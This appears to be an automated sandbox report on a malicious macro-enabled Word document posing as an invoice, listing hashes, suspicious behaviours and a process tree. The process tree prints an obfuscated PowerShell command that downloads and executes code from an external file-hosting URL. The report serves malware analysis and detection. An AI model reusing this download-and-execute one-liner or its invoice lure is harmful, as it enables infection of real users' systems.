Analysis
-
max time kernel
239s -
max time network
243s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
10-06-2022 14:00
Static task
static1
Behavioral task
behavioral1
Sample
INVOICE PACKAGE LINK TO DOWNLOAD.docm
Resource
win10v2004-20220414-en
General
-
Target
INVOICE PACKAGE LINK TO DOWNLOAD.docm
-
Size
16KB
-
MD5
f2d0c66b801244c059f636d08a474079
-
SHA1
c62129fff128817b5af62aa0051c082f9992112e
-
SHA256
08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873
-
SHA512
5283b2c228d6bdfe5d942f0a318ecd7e251e8a78d1451dc825f05e35d5e07a362e04c8777f63761b13bc672e76391cdc11be5e86ae4a260715e3e5a5cd2f305d
Malware Config
Extracted
https://filetransfer.io/data-package/UR2whuBv/download
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1504 2512 powershell.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 5112 2512 powershell.exe WINWORD.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 35 1504 powershell.exe 81 5112 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEfirefox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
Processes:
firefox.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2512 WINWORD.EXE 2512 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1504 powershell.exe 1504 powershell.exe 5112 powershell.exe 5112 powershell.exe 5112 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exefirefox.exedescription pid process Token: SeDebugPrivilege 1504 powershell.exe Token: SeDebugPrivilege 5112 powershell.exe Token: SeDebugPrivilege 4248 firefox.exe Token: SeDebugPrivilege 4248 firefox.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
firefox.exepid process 4248 firefox.exe 4248 firefox.exe 4248 firefox.exe 4248 firefox.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
firefox.exepid process 4248 firefox.exe 4248 firefox.exe 4248 firefox.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
WINWORD.EXEfirefox.exepid process 2512 WINWORD.EXE 2512 WINWORD.EXE 2512 WINWORD.EXE 2512 WINWORD.EXE 2512 WINWORD.EXE 2512 WINWORD.EXE 2512 WINWORD.EXE 2512 WINWORD.EXE 2512 WINWORD.EXE 4248 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WINWORD.EXEfirefox.exefirefox.exedescription pid process target process PID 2512 wrote to memory of 1504 2512 WINWORD.EXE powershell.exe PID 2512 wrote to memory of 1504 2512 WINWORD.EXE powershell.exe PID 2512 wrote to memory of 5112 2512 WINWORD.EXE powershell.exe PID 2512 wrote to memory of 5112 2512 WINWORD.EXE powershell.exe PID 1532 wrote to memory of 4248 1532 firefox.exe firefox.exe PID 1532 wrote to memory of 4248 1532 firefox.exe firefox.exe PID 1532 wrote to memory of 4248 1532 firefox.exe firefox.exe PID 1532 wrote to memory of 4248 1532 firefox.exe firefox.exe PID 1532 wrote to memory of 4248 1532 firefox.exe firefox.exe PID 1532 wrote to memory of 4248 1532 firefox.exe firefox.exe PID 1532 wrote to memory of 4248 1532 firefox.exe firefox.exe PID 1532 wrote to memory of 4248 1532 firefox.exe firefox.exe PID 1532 wrote to memory of 4248 1532 firefox.exe firefox.exe PID 4248 wrote to memory of 4776 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4776 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 4376 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 2296 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 2296 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 2296 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 2296 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 2296 4248 firefox.exe firefox.exe PID 4248 wrote to memory of 2296 4248 firefox.exe firefox.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INVOICE PACKAGE LINK TO DOWNLOAD.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.0.1282594299\2012578561" -parentBuildID 20200403170909 -prefsHandle 1684 -prefMapHandle 1600 -prefsLen 1 -prefMapSize 219989 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 1764 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.3.1318757906\1276019456" -childID 1 -isForBrowser -prefsHandle 2380 -prefMapHandle 1480 -prefsLen 112 -prefMapSize 219989 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 2328 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4248.13.2093681315\2130023771" -childID 2 -isForBrowser -prefsHandle 3692 -prefMapHandle 3688 -prefsLen 6894 -prefMapSize 219989 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4248 "\\.\pipe\gecko-crash-server-pipe.4248" 3712 tab3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5abc27673d9c940ad74b41c58391d2412
SHA19a31a521a521dcd0f974ce6f7a50aecc69a50df0
SHA256cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357
SHA512c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4
-
memory/1504-138-0x000002AA5FBE0000-0x000002AA5FC02000-memory.dmpFilesize
136KB
-
memory/1504-137-0x0000000000000000-mapping.dmp
-
memory/1504-140-0x00007FFE4BAE0000-0x00007FFE4C5A1000-memory.dmpFilesize
10.8MB
-
memory/1504-139-0x00007FFE4BAE0000-0x00007FFE4C5A1000-memory.dmpFilesize
10.8MB
-
memory/2512-136-0x00007FFE35080000-0x00007FFE35090000-memory.dmpFilesize
64KB
-
memory/2512-133-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmpFilesize
64KB
-
memory/2512-130-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmpFilesize
64KB
-
memory/2512-135-0x00007FFE35080000-0x00007FFE35090000-memory.dmpFilesize
64KB
-
memory/2512-134-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmpFilesize
64KB
-
memory/2512-132-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmpFilesize
64KB
-
memory/2512-131-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmpFilesize
64KB
-
memory/5112-141-0x0000000000000000-mapping.dmp
-
memory/5112-144-0x00007FFE4A430000-0x00007FFE4AEF1000-memory.dmpFilesize
10.8MB
-
memory/5112-145-0x00007FFE4A430000-0x00007FFE4AEF1000-memory.dmpFilesize
10.8MB